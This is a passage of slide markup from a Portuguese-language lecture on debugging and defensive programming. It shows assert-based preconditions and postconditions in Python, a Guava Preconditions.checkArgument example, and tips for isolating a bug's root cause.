        <p:spPr>
          <a:xfrm>
            <a:off x="2413700" y="4011175"/>
            <a:ext cx="1451100" cy="580200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864800" y="4129675"/>
            <a:ext cx="51846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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Melhor abortar o programa (com a falha de um assert), do que deixar a sua execução prosseguir com um "preço" negativo</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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4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Exemplo 2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1533475"/>
            <a:ext cx="8810700" cy="25623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en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> velocity(latitude, longitude, elevation:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    # Preconditions</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -90 &lt;= latitude &lt;= 90, "Latitude must be between -90 and 90"</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 0 &lt;= longitude &lt; 360, "Longitude must be between 0 (inclusive) and 360 (exclusive)"</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -500 &lt;= elevation &lt;= 75000, "Elevation must be between -500 and 75000 meters"</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    return_velocity = latitude * 0.1 + longitude * 0.05 - elevation * 0.001</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">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200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Postconditions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>assert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> 0 &lt;= return_velocity &lt;= 600, "Return velocity must be between 0 and 600"</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> return_velocity</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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27" name="Google Shape;227;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7826045" y="53000"/>
            <a:ext cx="1110575" cy="13567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4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Exemplo 3: Google Guava</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="387900" y="1304875"/>
            <a:ext cx="8058300" cy="19179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en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>public static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> double sqrt(double value) {</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:highlight>
                  <a:srgbClr val="FFF2CC"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Preconditions.checkArgument(value &gt;= 0.0, "negative value: %s", value);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:highlight>
                <a:srgbClr val="FFF2CC"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  // calculate the square root</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void exampleBadCaller() {</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  double d = sqrt(-1.0);</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="Google Shape;234;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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35" name="Google Shape;235;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021500" y="4553775"/>
            <a:ext cx="62514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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://guava.dev/releases/19.0/api/docs/com/google/common/base/Preconditions.html</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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4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3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>. Identificar a causa raiz do bug</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="1534800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Mais fácil, se o bug foi devidamente isolado</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sugestão: leia com calma as mensagens de erro</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sugestão: escreva pequenos programas que testem, de forma isolada e separada, o comportamento do código ou de alguma biblioteca que ele esteja usando</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Sugestão: rodar um linter</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
